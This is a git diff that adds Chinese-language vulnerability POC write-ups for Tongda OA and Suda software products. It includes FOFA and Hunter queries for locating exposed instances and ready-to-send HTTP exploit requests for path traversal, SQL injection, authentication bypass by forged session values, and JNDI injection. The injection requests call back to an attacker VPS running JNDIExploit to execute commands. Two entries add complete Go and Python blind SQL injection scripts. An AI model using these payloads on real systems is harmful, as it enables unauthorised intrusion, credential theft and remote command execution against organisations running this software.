+![1712850782609-4e5c9d7e-83f7-424a-a2c9-6b4e13128715.png](./img/lOUel4FBxVvzVwmN/1712850782609-4e5c9d7e-83f7-424a-a2c9-6b4e13128715-805008.png)
+
+
+
+> 更新: 2024-12-28 13:05:34  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/cnd2xobo2ctwtife>
\ No newline at end of file
diff --git a/通达OA down.php接口存在未授权访问漏洞.md b/通达OA down.php接口存在未授权访问漏洞.md
index 5bba152..557b3e1 100644
--- a/通达OA down.php接口存在未授权访问漏洞.md	
+++ b/通达OA down.php接口存在未授权访问漏洞.md	
@@ -17,3 +17,5 @@ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
 Accept: */*
 Connection: Keep-Alive
 ```
+
+![](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411281008543.png)
diff --git a/通达OA-down.php接口存在未授权访问漏洞.md b/通达OA-down.php接口存在未授权访问漏洞.md
new file mode 100644
index 0000000..5bba152
--- /dev/null
+++ b/通达OA-down.php接口存在未授权访问漏洞.md
@@ -0,0 +1,19 @@
+
+## 通达OA down.php接口存在未授权访问漏洞
+
+## fofa
+```
+app="TDXK-通达OA"
+```
+
+## poc
+
+```
+http://127.0.0.1/inc/package/down.php?id=../../../cache/org
+
+GET /inc/package/down.php?id=../../../cache/org HTTP/1.1
+Host: 127.0.0.1
+User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
+Accept: */*
+Connection: Keep-Alive
+```
diff --git a/通达OA-get_datas.php前台sql注入.md b/通达OA-get_datas.php前台sql注入.md
new file mode 100644
index 0000000..03c87d1
--- /dev/null
+++ b/通达OA-get_datas.php前台sql注入.md
@@ -0,0 +1,26 @@
+## 通达OA get_datas.php前台sql注入
+
+##  fofa
+```
+app="TDXK-通达OA"
+```
+
+## POC
+```
+POST /general/reportshop/utils/get_datas.php HTTP/1.1
+Host: {{HostName}}
+Accept-Encoding: gzip, deflate
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
+Content-Length: 2
+
+USER_ID=OfficeTask&PASSWORD=&col=1,1&tab=5 where 1={`\='` 1} union (select uid,sid from user_online where 1\={`=` 1})-- '1**
+```
+![image](https://github.com/wy876/POC/assets/139549762/55ba1ee3-215b-4fd2-8c0c-0694a20f6bfd)
+
+![image](https://github.com/wy876/POC/assets/139549762/3d0399a3-9fe9-46d9-b725-12acb84d422c)
+
+
+## 漏洞来源
+```
+https://forum.butian.net/share/278
+```
diff --git a/通达OA-header身份认证绕过漏洞.md b/通达OA-header身份认证绕过漏洞.md
new file mode 100644
index 0000000..96550e3
--- /dev/null
+++ b/通达OA-header身份认证绕过漏洞.md
@@ -0,0 +1,29 @@
+## 通达OA header身份认证绕过漏洞
+通达OA（Office Anywhere网络智能办公系统）是中国通达公司的一套协同办公自动化软件，通达OA2013，通达OA2016，通达OA2017 存在身份认证绕过漏洞，攻击者通过构造特定的数据包，获取登录cookie，利用cookie进行未授权访问。
+
+## fofa
+```
+title="office Anywhere"
+```
+
+
+## poc
+```
+POST /module/retrieve_pwd/header.inc.php HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
+Accept-Encoding: gzip, deflate
+Connection: close
+Upgrade-Insecure-Requests: 1
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 1024
+
+_SESSION[LOGIN_THEME]=15&_SESSION[LOGIN_USER_ID]=1&_SESSION[LOGIN_UID]=1&_SESSION[LOGIN_FUNC_STR]=1,3,42,643,644,634,4,147,148,7,8,9,10,16,11,130,5,131,132,256,229,182,183,194,637,134,37,135,136,226,253,254,255,536,24,196,105,119,80,96,97,98,114,126,179,607,539,251,127,238,128,85,86,87,88,89,137,138,222,90,91,92,152,93,94,95,118,237,108,109,110,112,51,53,54,153,217,150,239,240,218,219,43,17,18,19,15,36,70,76,77,115,116,185,235,535,59,133,64,257,2,74,12,68,66,67,13,14,40,41,44,75,27,60,61,481,482,483,484,485,486,487,488,489,490,491,492,120,494,495,496,497,498,499,500,501,502,503,505,504,26,506,507,508,515,537,122,123,124,628,125,630,631,632,633,55,514,509,29,28,129,510,511,224,39,512,513,252,230,231,232,629,233,234,461,462,463,464,465,466,467,468,469,470,471,472,473,474,475,200,202,201,203,204,205,206,207,208,209,65,187,186,188,189,190,191,606,192,193,221,550,551,73,62,63,34,532,548,640,641,642,549,601,600,602,603,604,46,21,22,227,56,30,31,33,32,605,57,609,103,146,107,197,228,58,538,151,6,534,69,71,72,223,639,
+
+```
+![image](https://github.com/wy876/POC/assets/139549762/b5cf4a04-f5e9-47d5-b463-528fac5133c0)
+
+第二步：验证cookie是否有效
+![image](https://github.com/wy876/POC/assets/139549762/161f8b28-059c-4132-b9b7-8435dd124e14)
+
+![image](https://github.com/wy876/POC/assets/139549762/f44e5dc2-2a95-4900-9f71-9001ef870980)
diff --git a/通达OA-sql注入漏洞-CVE-2023-4165.md b/通达OA-sql注入漏洞-CVE-2023-4165.md
new file mode 100644
index 0000000..d73a0d8
--- /dev/null
+++ b/通达OA-sql注入漏洞-CVE-2023-4165.md
@@ -0,0 +1,128 @@
+## 通达OA sql注入漏洞 CVE-2023-4165
+
+## 影响版本
+```
+通达OA ≤ v11.10，v2017
+```
+## poc
+```
+GET /general/system/seal_manage/iweboffice/delete_seal.php?DELETE_STR=1)%20and%20(substr(DATABASE(),1,1))=char(84)%20and%20(select%20count(*)%20from%20information_schema.columns%20A,information_schema.columns%20B)%20and(1)=(1 HTTP/1.1
+Host: 127.0.0.1:8080
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Connection: close
+Upgrade-Insecure-Requests: 1
+```
+## FOFA语法：
+```
+app="TDXK-通达OA" && icon_hash="-759108386"
+
+```
+## 利用脚本
+### go
+```go
+package main
+
+import (
+ "fmt"
+ "net/http"
+ "strings"
+ "time"
+)
+// 通达OA CVE-2023-4165&CVE-2023-4166 注入漏洞
+func main() {
+ // /general/system/seal_manage/iweboffice/delete_seal.php?DELETE_STR=1  general/system/seal_manage/dianju/delete_log.php
+ url := "http://127.0.0.1/general/system/seal_manage/iweboffice/delete_seal.php"                                                                                     // 目标网站的URL
+ delay := 2                                                                                                                                                          // 延迟时间，单位为秒
+ cookieValue := "PHPSESSID=pv74trjff1qshvt5dktujjfbq3; USER_NAME_COOKIE=admin; OA_USER_ID=admin; SID_1=ec800c19" // 替换为有效的Cookie值
+
+ characters := "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_!@#$%^&*()+-" // 可能的字符集
+
+ result := ""
+ for i := 1; i <= 30; i++ { // 假设字符的最大长度为30
+  found := false
+  for _, char := range characters {
+   payload := fmt.Sprintf("1) and (substr(USER(),%d,1))=char(%d) and (select count(*) from information_schema.columns A,information_schema.columns B) and(1)=(1", i, int(char)) // 构造payload
+   //print(payload, "n")
+   req, err := http.NewRequest("GET", url, nil)
+   if err != nil {
+    fmt.Println("创建请求失败:", err)
+    return
+   }
+
+   // 使用分号分隔的每个Cookie项
+   cookieItems := strings.Split(cookieValue, "; ")
+   for _, item := range cookieItems {
+    itemSplit := strings.SplitN(item, "=", 2) // 按照等号（=）分隔键值对
+    if len(itemSplit) == 2 {
+     cookie := &http.Cookie{
+      Name:  itemSplit[0],
+      Value: itemSplit[1],
+     }
+     req.AddCookie(cookie)
+    }
+   }
+
+   req.URL.RawQuery = "DELETE_STR=" + payload //构建请求，其DELETE_STR是本次的注入参数
+
+   startTime := time.Now()
+   resp, err := http.DefaultClient.Do(req)
+   if err != nil {
+    fmt.Println("发送请求失败:", err)
+    return
+   }
+   defer resp.Body.Close()
+
+   endTime := time.Now()
+   responseTime := endTime.Sub(startTime)
+
+   if responseTime >= time.Duration(delay)*time.Second {
+    result += string(char)
+    fmt.Println("", result)
+    found = true
+    break
+   }
+  }
+
+  if !found {
+   break
+  }
+ }
+
+ fmt.Println("Database: " + result)
+}
+```
+
+### Python
+```python
+import requests
+import time
+
+headers={"Cookie":"PHPSESSID=hji419h9o5gc4dk3ftfqocmu42; USER_NAME_COOKIE=admin; OA_USER_ID=admin; SID_1=baae495a"}
+
+characters = "abcdefghijklmnopqrstuvwxyz0123456789_!@#$%^&*()+-"
+
+url = "http://127.0.0.1/general/system/seal_manage/iweboffice/delete_seal.php?DELETE_STR="
+
+result = ""
+
+for i in range(1,31):
+    found = False
+    for c in characters:
+        payload = f"1) and (substr(USER(),{i},1))=char({ord(c)}) and (select count(*) from information_schema.columns A,information_schema.columns B) and(1)=(1"
+        start_time = time.time()
+        res = requests.get(url=url+payload,headers=headers)
+        end_time = time.time()
+        elapsed_time = end_time - start_time
+        
+        if elapsed_time >= 2:
+            result +=c
+            print(result)
+            found = True
+    if not found:
+        break
+    
+print("Databas:",result)
+```
diff --git a/通达OA-sql注入漏洞-CVE-2023-4166.md b/通达OA-sql注入漏洞-CVE-2023-4166.md
new file mode 100644
index 0000000..2adf9bf
--- /dev/null
+++ b/通达OA-sql注入漏洞-CVE-2023-4166.md
@@ -0,0 +1,132 @@
+## 通达OA sql注入漏洞 CVE-2023-4166
+复现版本：11.7版
+
+## 影响版本
+```
+通达OA ≤ v11.10，v2017
+```
+
+## poc
+``` 
+GET /general/system/seal_manage/dianju/delete_log.php?DELETE_STR=1)%20and%20(substr(DATABASE(),1,1))=char(84)%20and%20(select%20count(*)%20from%20information_schema.columns%20A,information_schema.columns%20B)%20and(1)=(1 HTTP/1.1
+Host: 127.0.0.1:8080
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Connection: close
+```
+
+## FOFA语法：
+```
+app="TDXK-通达OA" && icon_hash="-759108386"
+
+```
+## 利用脚本
+### go
+```go
+package main
+
+import (
+ "fmt"
+ "net/http"
+ "strings"
+ "time"
+)
+// 通达OA CVE-2023-4165&CVE-2023-4166 注入漏洞
+func main() {
+ // /general/system/seal_manage/iweboffice/delete_seal.php?DELETE_STR=1  general/system/seal_manage/dianju/delete_log.php
+ url := "http://127.0.0.1/general/system/seal_manage/dianju/delete_log.php"                                                                                     // 目标网站的URL
+ delay := 2                                                                                                                                                          // 延迟时间，单位为秒
+ cookieValue := "PHPSESSID=pv74trjff1qshvt5dktujjfbq3; USER_NAME_COOKIE=admin; OA_USER_ID=admin; SID_1=ec800c19" // 替换为有效的Cookie值
+
+ characters := "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_!@#$%^&*()+-" // 可能的字符集
+
+ result := ""
+ for i := 1; i <= 30; i++ { // 假设字符的最大长度为30
+  found := false
+  for _, char := range characters {
+   payload := fmt.Sprintf("1) and (substr(USER(),%d,1))=char(%d) and (select count(*) from information_schema.columns A,information_schema.columns B) and(1)=(1", i, int(char)) // 构造payload
+   //print(payload, "n")
+   req, err := http.NewRequest("GET", url, nil)
+   if err != nil {
+    fmt.Println("创建请求失败:", err)
+    return
+   }
+
+   // 使用分号分隔的每个Cookie项
+   cookieItems := strings.Split(cookieValue, "; ")
+   for _, item := range cookieItems {
+    itemSplit := strings.SplitN(item, "=", 2) // 按照等号（=）分隔键值对
+    if len(itemSplit) == 2 {
+     cookie := &http.Cookie{
+      Name:  itemSplit[0],
+      Value: itemSplit[1],
+     }
+     req.AddCookie(cookie)
+    }
+   }
+
+   req.URL.RawQuery = "DELETE_STR=" + payload //构建请求，其DELETE_STR是本次的注入参数
+
+   startTime := time.Now()
+   resp, err := http.DefaultClient.Do(req)
+   if err != nil {
+    fmt.Println("发送请求失败:", err)
+    return
+   }
+   defer resp.Body.Close()
+
+   endTime := time.Now()
+   responseTime := endTime.Sub(startTime)
+
+   if responseTime >= time.Duration(delay)*time.Second {
+    result += string(char)
+    fmt.Println("", result)
+    found = true
+    break
+   }
+  }
+
+  if !found {
+   break
+  }
+ }
+
+ fmt.Println("Database: " + result)
+}
+```
+
+### Python
+```python
+import requests
+import time
+
+headers={"Cookie":"PHPSESSID=hji419h9o5gc4dk3ftfqocmu42; USER_NAME_COOKIE=admin; OA_USER_ID=admin; SID_1=baae495a"}
+
+characters = "abcdefghijklmnopqrstuvwxyz0123456789_!@#$%^&*()+-"
+
+url = "http://127.0.0.1/general/system/seal_manage/dianju/delete_log.php?DELETE_STR="
+
+result = ""
+
+for i in range(1,31):
+    found = False
+    for c in characters:
+        payload = f"1) and (substr(USER(),{i},1))=char({ord(c)}) and (select count(*) from information_schema.columns A,information_schema.columns B) and(1)=(1"
+        start_time = time.time()
+        res = requests.get(url=url+payload,headers=headers)
+        end_time = time.time()
+        elapsed_time = end_time - start_time
+        
+        if elapsed_time >= 2:
+            result +=c
+            print(result)
+            found = True
+    if not found:
+        break
+    
+print("Databas:",result)
+```
+
+![](./assets/20231104223332.png)
diff --git a/通达OA前台submenu.php存在SQL注入漏洞(CVE-2024-10600).md b/通达OA前台submenu.php存在SQL注入漏洞(CVE-2024-10600).md
new file mode 100644
index 0000000..65dc353
--- /dev/null
+++ b/通达OA前台submenu.php存在SQL注入漏洞(CVE-2024-10600).md
@@ -0,0 +1,28 @@
+# 通达OA前台submenu.php存在SQL注入漏洞(CVE-2024-10600)
+
+pda/appcenter/submenu.php 未包含inc/auth.inc.php且 $appid 参数未用'包裹导致前台SQL注入
+
+## 影响范围
+
+v2017-v11.6
+
+## fofa
+
+```javascript
+app="TDXK-通达OA" && icon_hash="-759108386"
+```
+
+## poc
+
+```javascript
+http://192.168.0.106/pda/appcenter/submenu.php?appid=1%20and%20(substr(DATABASE(),1,1))=char(116)%20and%20(select%20count(*)%20from%20information_schema.columns%20A,information_schema.columns%20B)
+```
+
+![53147e26ebbc31217d5db726977a1f4f](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411101147145.png)
+
+
+
+## 漏洞来源
+
+- https://github.com/LvZCh/td/issues/3
+- https://mp.weixin.qq.com/s/TL1QWIpSpnrqcJ4rTXTTdQ
diff --git a/速达软件技术（广州）有限公司多款产品doGetAccsetList存在JNID注入漏洞.md b/速达软件技术（广州）有限公司多款产品doGetAccsetList存在JNID注入漏洞.md
new file mode 100644
index 0000000..a708012
--- /dev/null
+++ b/速达软件技术（广州）有限公司多款产品doGetAccsetList存在JNID注入漏洞.md
@@ -0,0 +1,76 @@
+# 速达软件技术（广州）有限公司多款产品doGetAccsetList存在JNID注入漏洞
+
+# 一、漏洞简介
+速达软件技术（广州）有限公司多款产品doGetAccsetList存在JNID注入漏洞,攻击者可通过该漏洞获取服务器权限。
+
+# 二、影响版本
++ 速达软件技术（广州）有限公司多款产品
+
+# 三、资产测绘
++ hunter`web.body="速达软件技术（广州）有限公司"`
++ 特征
+
+![1699201284929-aa4ce68c-746e-4b42-b2a6-5ee57011daf5.png](./img/Vh0u6SfE9CYrencQ/1699201284929-aa4ce68c-746e-4b42-b2a6-5ee57011daf5-024504.png)
+
+![1699201312048-19df152b-1307-4860-87ac-d74fe2d646ae.png](./img/Vh0u6SfE9CYrencQ/1699201312048-19df152b-1307-4860-87ac-d74fe2d646ae-424849.png)
+
+# 四、漏洞复现
+1. 获取dnslog
+
+```plain
+s7c4np.dnslog.cn
+```
+
+![1705076444377-d57cc238-fa42-4943-b568-cd8f02ef3dbb.png](./img/Vh0u6SfE9CYrencQ/1705076444377-d57cc238-fa42-4943-b568-cd8f02ef3dbb-942093.png)
+
+2. 检测是否存在漏洞
+
+```plain
+GET /login/login!doGetAccsetList.action?report=${jndi:ldap://s7c4np.dnslog.cn} HTTP/1.1
+Host: 
+Pragma: no-cache
+Cache-Control: no-cache
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Accept-Encoding: gzip, deflate, br
+Accept-Language: zh-CN,zh;q=0.9
+Cookie: JSESSIONID=95B4E05547D0C692CF0D0DD69AC5241B
+Connection: close
+```
+
+![1705076482745-7d180eeb-6296-47ee-927f-7091624b3756.png](./img/Vh0u6SfE9CYrencQ/1705076482745-7d180eeb-6296-47ee-927f-7091624b3756-118860.png)
+
+漏洞利用
+
+[JNDIExploit-1.4-SNAPSHOT.jar](https://www.yuque.com/attachments/yuque/0/2024/jar/1622799/1709222146364-082044c2-ac87-44a7-811f-9736dc52da70.jar)
+
+将`JNDIExploit-1.4-SNAPSHOT.jar`上传到`vps`
+
+```plain
+java -jar JNDIExploit-1.4-SNAPSHOT.jar -i vpsip
+```
+
+![1705075364344-caf730e8-f910-4617-87ae-297aec05dbeb.png](./img/Vh0u6SfE9CYrencQ/1705075364344-caf730e8-f910-4617-87ae-297aec05dbeb-351326.png)
+
+```plain
+GET /login/login!doGetAccsetList.action?report=${jndi:ldap://vpsip:1389/Basic/TomcatEcho} HTTP/1.1
+Host: 
+Pragma: no-cache
+Cache-Control: no-cache
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Accept-Encoding: gzip, deflate, br
+Accept-Language: zh-CN,zh;q=0.9
+cmd: whoami
+Cookie: JSESSIONID=95B4E05547D0C692CF0D0DD69AC5241B
+Connection: close
+```
+
+![1705076557686-ad6fd9ba-b8ba-48ba-92df-0f088046963b.png](./img/Vh0u6SfE9CYrencQ/1705076557686-ad6fd9ba-b8ba-48ba-92df-0f088046963b-079061.png)
+
+
+
+> 更新: 2024-02-29 23:55:46  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/wyzfyvuxdlu610a7>
\ No newline at end of file
diff --git a/速达软件技术（广州）有限公司多款产品doSavePrintTpl存在JNID注入漏洞.md b/速达软件技术（广州）有限公司多款产品doSavePrintTpl存在JNID注入漏洞.md
new file mode 100644
index 0000000..dfff7c1
--- /dev/null
+++ b/速达软件技术（广州）有限公司多款产品doSavePrintTpl存在JNID注入漏洞.md
@@ -0,0 +1,78 @@
+# 速达软件技术（广州）有限公司多款产品doSavePrintTpl存在JNID注入漏洞
+
+# 一、漏洞简介
+速达软件技术（广州）有限公司多款产品doSavePrintTpl存在JNID注入漏洞,攻击者可通过该漏洞获取服务器权限。
+
+# 二、影响版本
++ 速达软件技术（广州）有限公司多款产品
+
+# 三、资产测绘
++ hunter`web.body="速达软件技术（广州）有限公司"`
++ 特征
+
+![1699201284929-aa4ce68c-746e-4b42-b2a6-5ee57011daf5.png](./img/QAbLP8DmRYya9Ntj/1699201284929-aa4ce68c-746e-4b42-b2a6-5ee57011daf5-904597.png)
+
+![1699201312048-19df152b-1307-4860-87ac-d74fe2d646ae.png](./img/QAbLP8DmRYya9Ntj/1699201312048-19df152b-1307-4860-87ac-d74fe2d646ae-167294.png)
+
+# 四、漏洞复现
+1. 获取dnslog
+
+```plain
+dffd7g.dnslog.cn
+```
+
+![1705076759218-f2ad57b9-38b3-4bfb-8f69-79043a410b56.png](./img/QAbLP8DmRYya9Ntj/1705076759218-f2ad57b9-38b3-4bfb-8f69-79043a410b56-744974.png)
+
+2. 检测是否存在漏洞
+
+```plain
+GET /common/print/print!doSavePrintTpl.action?report=${jndi:ldap://dffd7g.dnslog.cn}&&rptid=1&employId=1&accsetName=1&modId=1 HTTP/1.1
+Host: 
+Pragma: no-cache
+Cache-Control: no-cache
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Accept-Encoding: gzip, deflate, br
+Accept-Language: zh-CN,zh;q=0.9
+Cookie: JSESSIONID=95B4E05547D0C692CF0D0DD69AC5241B
+Connection: close
+```
+
+![1705076798010-03a14e61-09f8-48d9-9296-d38fd1468d27.png](./img/QAbLP8DmRYya9Ntj/1705076798010-03a14e61-09f8-48d9-9296-d38fd1468d27-576024.png)
+
+![1705076811911-81f56a2d-56c6-419b-947c-0451210e8e69.png](./img/QAbLP8DmRYya9Ntj/1705076811911-81f56a2d-56c6-419b-947c-0451210e8e69-461086.png)
+
+漏洞利用
+
+[JNDIExploit-1.4-SNAPSHOT.jar](https://www.yuque.com/attachments/yuque/0/2024/jar/1622799/1709222146317-10daccfd-9800-4fa7-899a-ce904aab6f1d.jar)
+
+将`JNDIExploit-1.4-SNAPSHOT.jar`上传到`vps`
+
+```plain
+java -jar JNDIExploit-1.4-SNAPSHOT.jar -i vpsip
+```
+
+![1705075364344-caf730e8-f910-4617-87ae-297aec05dbeb.png](./img/QAbLP8DmRYya9Ntj/1705075364344-caf730e8-f910-4617-87ae-297aec05dbeb-838512.png)
+
+```plain
+GET /common/print/print!doSavePrintTpl.action?report=${jndi:ldap://vpsip:1389/Basic/TomcatEcho}&&rptid=1&employId=1&accsetName=1&modId=1 HTTP/1.1
+Host: 
+Pragma: no-cache
+Cache-Control: no-cache
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Accept-Encoding: gzip, deflate, br
+Accept-Language: zh-CN,zh;q=0.9
+cmd: whoami
+Cookie: JSESSIONID=95B4E05547D0C692CF0D0DD69AC5241B
+Connection: close
+```
+
+![1705076893410-959d7fbf-d434-483d-b195-e12231942b95.png](./img/QAbLP8DmRYya9Ntj/1705076893410-959d7fbf-d434-483d-b195-e12231942b95-014530.png)
+
+
+
+> 更新: 2024-02-29 23:55:46  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/naif5is5o46eq9h6>
\ No newline at end of file
diff --git a/速达软件技术（广州）有限公司多款产品doSavePrintTpl存在SQL注入漏洞.md b/速达软件技术（广州）有限公司多款产品doSavePrintTpl存在SQL注入漏洞.md
new file mode 100644
index 0000000..ab4246f
--- /dev/null
+++ b/速达软件技术（广州）有限公司多款产品doSavePrintTpl存在SQL注入漏洞.md
@@ -0,0 +1,51 @@
+# 速达软件技术（广州）有限公司多款产品doSavePrintTpl存在SQL注入漏洞
+
+# 一、漏洞简介
+速达软件技术（广州）有限公司多款产品doSavePrintTpl存在SQL注入漏洞
+
+# 二、影响版本
++ 速达软件技术（广州）有限公司多款产品
+
+# 三、资产测绘
++ hunter`web.body="速达软件技术（广州）有限公司"`
++ 特征
+
+![1699201284929-aa4ce68c-746e-4b42-b2a6-5ee57011daf5.png](./img/Si9C0gSG68Sdjyok/1699201284929-aa4ce68c-746e-4b42-b2a6-5ee57011daf5-608754.png)
+
+![1699201312048-19df152b-1307-4860-87ac-d74fe2d646ae.png](./img/Si9C0gSG68Sdjyok/1699201312048-19df152b-1307-4860-87ac-d74fe2d646ae-495074.png)
+
+# 四、漏洞复现
+```plain
+GET /common/print/print!doSavePrintTpl.action?report=1&rptid=1&employId=1&accsetName=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&modId=1 HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Connection: close
+Cookie: JSESSIONID=95EE3D005EFC17F6D1246339EA7617CB
+Upgrade-Insecure-Requests: 1
+```
+
+![1705074370016-a37fced7-17fc-4b64-aab5-352671640d38.png](./img/Si9C0gSG68Sdjyok/1705074370016-a37fced7-17fc-4b64-aab5-352671640d38-736967.png)
+
+sqlmap
+
+```plain
+GET /common/print/print!doSavePrintTpl.action?report=1&rptid=1&employId=1&accsetName=1&modId=1 HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Connection: close
+Cookie: JSESSIONID=95EE3D005EFC17F6D1246339EA7617CB
+Upgrade-Insecure-Requests: 1
+```
+
+![1705074401317-a2a6a0cf-f844-4f08-83f7-8af83f6a4834.png](./img/Si9C0gSG68Sdjyok/1705074401317-a2a6a0cf-f844-4f08-83f7-8af83f6a4834-074768.png)
+
+
+
+> 更新: 2024-02-29 23:55:46  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/giuash5tw64if5lo>
\ No newline at end of file
diff --git a/速达软件技术（广州）有限公司多款产品home_jsontest存在JNID注入漏洞.md b/速达软件技术（广州）有限公司多款产品home_jsontest存在JNID注入漏洞.md
new file mode 100644
index 0000000..5e8dc63
--- /dev/null
+++ b/速达软件技术（广州）有限公司多款产品home_jsontest存在JNID注入漏洞.md
@@ -0,0 +1,72 @@
+# 速达软件技术（广州）有限公司多款产品home_jsontest存在JNID注入漏洞
+
+# 一、漏洞简介
+速达软件技术（广州）有限公司多款产品home_jsontest存在JNID注入漏洞,攻击者可通过该漏洞获取服务器权限。
+
+# 二、影响版本
++ 速达软件技术（广州）有限公司多款产品
+
+# 三、资产测绘
++ hunter`web.body="速达软件技术（广州）有限公司"`
++ 特征
+
+![1699201284929-aa4ce68c-746e-4b42-b2a6-5ee57011daf5.png](./img/vbR5mYTuE8woTkQt/1699201284929-aa4ce68c-746e-4b42-b2a6-5ee57011daf5-774482.png)
+
+![1699201312048-19df152b-1307-4860-87ac-d74fe2d646ae.png](./img/vbR5mYTuE8woTkQt/1699201312048-19df152b-1307-4860-87ac-d74fe2d646ae-980863.png)
+
+# 四、漏洞复现
+1. 获取dnslog
+
+```plain
+56tcas.dnslog.cn
+```
+
+![1705075555323-9faae18e-4bfa-4803-a7d5-9408d85060f0.png](./img/vbR5mYTuE8woTkQt/1705075555323-9faae18e-4bfa-4803-a7d5-9408d85060f0-593145.png)
+
+2. 检测是否存在漏洞
+
+```plain
+GET /login/home_jsontest.action?reqType=json&ISLOGIN=TRUE&eid=1&msg=1&errNo=${jndi:ldap://56tcas.dnslog.cn} HTTP/1.1
+Host: 
+Upgrade-Insecure-Requests: 1
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Cookie: JSESSIONID=96BFB09D9ED705FAF1EFD3CF45ECFFFC
+Connection: close
+```
+
+![1705075600920-3fb66b0b-cb28-4cef-9746-025483e9b4b3.png](./img/vbR5mYTuE8woTkQt/1705075600920-3fb66b0b-cb28-4cef-9746-025483e9b4b3-699206.png)
+
+![1705075633851-0f65cea0-d544-45dc-b23d-8a1bb4d513db.png](./img/vbR5mYTuE8woTkQt/1705075633851-0f65cea0-d544-45dc-b23d-8a1bb4d513db-391053.png)
+
+漏洞利用
+
+[JNDIExploit-1.4-SNAPSHOT.jar](https://www.yuque.com/attachments/yuque/0/2024/jar/1622799/1709222146440-fd7d4f17-a37c-4c78-b216-daf75b276c2c.jar)
+
+将`JNDIExploit-1.4-SNAPSHOT.jar`上传到`vps`
+
+```plain
+java -jar JNDIExploit-1.4-SNAPSHOT.jar -i vpsip
+```
+
+![1705075364344-caf730e8-f910-4617-87ae-297aec05dbeb.png](./img/vbR5mYTuE8woTkQt/1705075364344-caf730e8-f910-4617-87ae-297aec05dbeb-265724.png)
+
+```plain
+GET /login/home_jsontest.action?reqType=json&ISLOGIN=TRUE&eid=1&msg=1&errNo=${jndi:ldap://vpsip:1389/Basic/TomcatEcho} HTTP/1.1
+Host: 
+Upgrade-Insecure-Requests: 1
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Accept-Encoding: gzip, deflate
+cmd: whoami
+Accept-Language: zh-CN,zh;q=0.9
+Cookie: JSESSIONID=96BFB09D9ED705FAF1EFD3CF45ECFFFC
+Connection: close
+```
+
+![1705075717234-da653e58-3474-4718-9917-d7a1d5f6e028.png](./img/vbR5mYTuE8woTkQt/1705075717234-da653e58-3474-4718-9917-d7a1d5f6e028-765312.png)
+
+
+
